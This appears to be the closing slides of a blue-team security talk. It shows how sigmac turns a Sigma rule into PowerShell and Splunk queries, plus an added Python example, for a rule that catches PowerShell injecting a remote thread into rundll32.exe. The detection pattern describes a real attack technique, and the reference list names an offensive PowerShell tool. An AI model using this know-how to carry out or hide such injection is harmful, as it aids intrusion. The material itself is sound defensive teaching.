• Logpoint
• Qualys
• Windows Defender ATP
• PowerShell
• grep
Example: PowerShell syntax

• Generate PowerShell syntax for the PowerShell remote thread creation in Rundll32.exe event:
$ sigmac -t powershell sysmon_susp_powershell_rundll32.yml

• PowerShell Get-WinEvent syntax to locate that event:
PS:/> Get-WinEvent | where {($_.ID -eq "8" -and $_.message -match "SourceImage.*.*\\powershell.exe" -and $_.message -match "TargetImage.*.*\\rundll32.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message

Example: Splunk syntax

• Generate Splunk syntax for the PowerShell remote thread creation in Rundll32.exe event:
$ sigmac -t splunk sysmon_susp_powershell_rundll32.yml

• Splunk syntax to locate that event:
(EventID="8" SourceImage="*\\powershell.exe" TargetImage="*\\rundll32.exe")

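To tie the Rule Format and Log Source slides to the two sigmac outputs above, here is an added Python example (not sigmac's code and not the published rule): a rule dict laid out the way the Sigma YAML schema describes (metadata, logsource, detection selectors, condition), reconstructed from the sigmac output on these slides, two tiny backends that reproduce the PowerShell and Splunk queries shown, a "mapping to your field names" parameter, and a direct matcher standing in for the grep backend. The title, status, description and level fields, the field-map names and the Sysmon event records are assumptions.

```python
import fnmatch
from typing import Dict, Iterator, Optional, Tuple

# Rule written for this example, following the Sigma schema on the slides; in a
# repository it lives in a YAML file (yaml.safe_load yields the same dict).
RULE = {
    "title": "PowerShell Rundll32 Remote Thread Creation",
    "status": "experimental",
    "description": "PowerShell creating a remote thread in rundll32.exe (Sysmon event 8)",
    "logsource": {"product": "windows", "service": "sysmon"},
    "detection": {
        "selection": {"EventID": 8,
                      "SourceImage": r"*\powershell.exe",
                      "TargetImage": r"*\rundll32.exe"},
        "condition": "selection",
    },
    "level": "high",
}


def _condition_terms(rule: Dict) -> Iterator[Tuple[bool, Dict]]:
    """Yield (negated, selector) for a condition such as 'sel and not filter'."""
    detection = rule["detection"]
    for token in detection["condition"].split(" and "):
        negated = token.startswith("not ")
        yield negated, detection[token[4:] if negated else token]


def to_splunk(rule: Dict, field_map: Optional[Dict[str, str]] = None) -> str:
    """Emit a Splunk search; field_map is the 'mapping to your field names'."""
    field_map = field_map or {}
    groups = []
    for negated, selector in _condition_terms(rule):
        terms = ['%s="%s"' % (field_map.get(f, f), str(v).replace("\\", "\\\\"))
                 for f, v in selector.items()]
        group = "(" + " ".join(terms) + ")"
        groups.append("NOT " + group if negated else group)
    return " ".join(groups)


def to_powershell(rule: Dict) -> str:
    """Emit the Get-WinEvent pipeline in the style of sigmac -t powershell."""
    groups = []
    for negated, selector in _condition_terms(rule):
        terms = []
        for field, value in selector.items():
            if field == "EventID":
                terms.append('$_.ID -eq "%s"' % value)
            else:
                # wildcard '*' becomes '.*'; backslashes are doubled for -match
                pattern = str(value).replace("\\", "\\\\").replace("*", ".*")
                terms.append('$_.message -match "%s.*%s"' % (field, pattern))
        group = "(" + " -and ".join(terms) + ")"
        groups.append("-not " + group if negated else group)
    return ("Get-WinEvent | where {" + " -and ".join(groups) + " } | select "
            "TimeCreated,Id,RecordId,ProcessId,MachineName,Message")


def matches(rule: Dict, event: Dict) -> bool:
    """Evaluate the rule directly against one event dict (the 'grep' backend)."""
    for negated, selector in _condition_terms(rule):
        hit = all(fnmatch.fnmatchcase(str(event.get(f, "")), str(v))
                  for f, v in selector.items())
        if hit == negated:
            return False
    return True


# Constructed Sysmon event 8 records for the matcher (not real log data)
REMOTE_THREAD_EVENTS = [
    {"EventID": 8,
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\rundll32.exe"},
    {"EventID": 8,
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\rundll32.exe"},
]

if __name__ == "__main__":
    print(to_splunk(RULE))
    print(to_powershell(RULE))
    print([matches(RULE, e) for e in REMOTE_THREAD_EVENTS])
```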
Example: Kibana syntax

Demo Time!

Thank you!

• Contact me on Twitter:
o @eric_conrad
• DeepBlueCLI is available at: https://github.com/sans-blue-team/DeepBlueCLI/
• A copy of this talk is available at http://ericconrad.com
• Check out Security 511 for more blue team goodness: http://sec511.com
• Security 530 (Defensible Security Architecture) describes controls for preventing these types of attacks

References
1. Deconstructing Petya: how it spreads and how to fight back, https://nakedsecurity.sophos.com/2017/06/28/deconstructing-petya-how-it-spreads-and-how-to-fight-back/
2. Mandiant M-Trends 2015, https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf
3. Command Line Kung Fu Episode #31: Remote Command Execution, http://blog.commandlinekungfu.com/2009/05/episode-31-remote-command-execution.html
4. PSAttack, https://github.com/jaredhaight/PSAttack
5. Posh-VirusTotal, https://github.com/darkoperator/Posh-VirusTotal
6. VirusTotal public API documentation, https://www.virustotal.com/en/documentation/public-api/
7. Security Onion: Elastic Stack alpha release, http://blog.securityonion.net/2017/09/elastic-stack-alpha-release-and.html
8. SOF-ELK, https://github.com/philhagen/sof-elk
9. NXLog Enterprise Edition, https://nxlog.co/products/nxlog-enterprise-edition
10. python-evtx, https://github.com/williballenthin/python-evtx
11. libevtx, https://github.com/libyal/libevtx